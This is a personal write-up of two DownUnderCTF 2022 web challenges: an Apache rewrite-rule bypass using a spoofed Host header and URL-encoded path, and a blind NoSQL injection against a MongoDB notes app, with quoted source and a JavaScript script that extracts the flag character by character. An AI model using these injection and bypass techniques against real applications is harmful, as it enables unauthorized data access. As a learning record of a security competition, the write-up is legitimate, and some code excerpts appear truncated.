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[Writeup] DownUnderCTF 2022

Posted on:September 23, 2022 at 06:04 PM


Archiving this for the sole purpose to prove I did stuff - The three CTFs I participated in prior to DUCTF were all korean so I didn’t bother writing a writeup. It was my first time playing a CTF in a team, having teammates encouraged me enough to grind more in a CTF where I felt like some challs were way out of my league. DUCTF was a huge event, so kudos to pjsk.

I’ll be skipping some challs and explaining helicoptering, noteworthy.


helicoptering - web



Apache uses a rewriting engine to manipulate requests, about which you can read more here

My approach was to

  1. bypass the host header as the first condition evaluates %{HTTP_HOST} and denies everything but localhost
  2. bypass %{THE_REQUEST} value as the second condition evaluates the word “flag”

So the solution would be

$ curl -H "Host:localhost" [site address part one]
$ curl [site address part two]/fl%61g.txt

noteworthy - web


 let admin = await User.findOne({ username: 'admin' })
    if(!admin) {
        admin = new User({ username: 'admin' })
    let note = await Note.findOne({ noteId: 1337 })
    if(!note) {
        const FLAG = process.env.FLAG || 'DUCTF{test_flag}'
        note = new Note({ owner: admin._id, noteId: 1337, contents: FLAG })

The flag is in a note which has 1337 for the noteId. So that’s our target..'/edit', ensureAuthed, async (req, res, next) => {
    let q = req.query
    try {
        if('noteId' in q && parseInt(q.noteId) != NaN) {
            const note = await Note.findOne(q)

            if(!note) {
                return next({ message: 'Note does not exist!' })

            if(note.owner.toString() != req.user.userId.toString()) {
                return next({ message: 'You are not the owner of this note!' })

            let { contents } = req.body
            if(!contents || contents.length > 200) {
                return next({ message: 'Invalid contents' })
            contents = contents.toString()
            note.contents = contents
            return res.json({ success: true, message: 'Note edited.' })
        } else {
            return next({ message: 'Invalid request' })
    } catch(e) {
        return next({ message: 'Invalid request' })

After some digging I was able to figure out the code doesn’t filter the query, enabling SQLi. The website used MongoDB which meant NoSQL injection.

router.get('/edit', ensureAuthed, async (req, res) => {
    let q = req.query
    try {
        if('noteId' in q && parseInt(q.noteId) != NaN) {
            const note = await Note.findOne(q)

            if(!note) {
                return res.render('error', { isLoggedIn: true, message: 'Note does not exist!' })

            if(note.owner.toString() != req.user.userId.toString()) {
                return res.render('error', { isLoggedIn: true, message: 'You are not the owner of this note!' })

            res.render('edit', { isLoggedIn: true, noteId: note.noteId, contents: note.contents })
        } else {
            return res.render('error', { isLoggedIn: true, message: 'Invalid request' })
    } catch {
        return res.render('error', { isLoggedIn: true, message: 'Invalid request' })

/edit?noteId=192304913 (its a random number) leads to the editing page. It blocks your access if you are not the owner but we’re able to inject payload here; as an example /edit?noteId[$ne]=192304913

Depending on whether the payload is true or false we get the message ‘Note does not exist!’ or ‘You are not the owner of this note!’ - basically enabling blind SQLi.

So my approach would be

  1. figuring out the length of the content as we know the target noteId
  2. figuring out the content itself.

leads to the message ‘You are not the owner of this note!’, so the flag length is 29

The first script I rushed out didn’t work, so I had to get help. The solution would be something like:

function pwn(params){
  var http = new XMLHttpRequest();
  var url = "/edit?noteId[$eq]=1337&contents[$regex]=DUCTF{n0sql1_1s_th3_new_"+params;"GET", url, false);
  http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  if(http.response.indexOf("You are not the owner of this note!") != -1){ return true; }
  else return false;

flag = "";
for(var i=0;i<30;i++){
for(var j=127;j>32;j--){
t = String.fromCharCode(j);
    if((t == "#") || (t == "&") || (t == "*") || (t == ".") || (t == ";") || (t == "?") || (t == "|")) continue;
    if(pwn(flag+t)==true){ flag += t; console.log(flag); break; }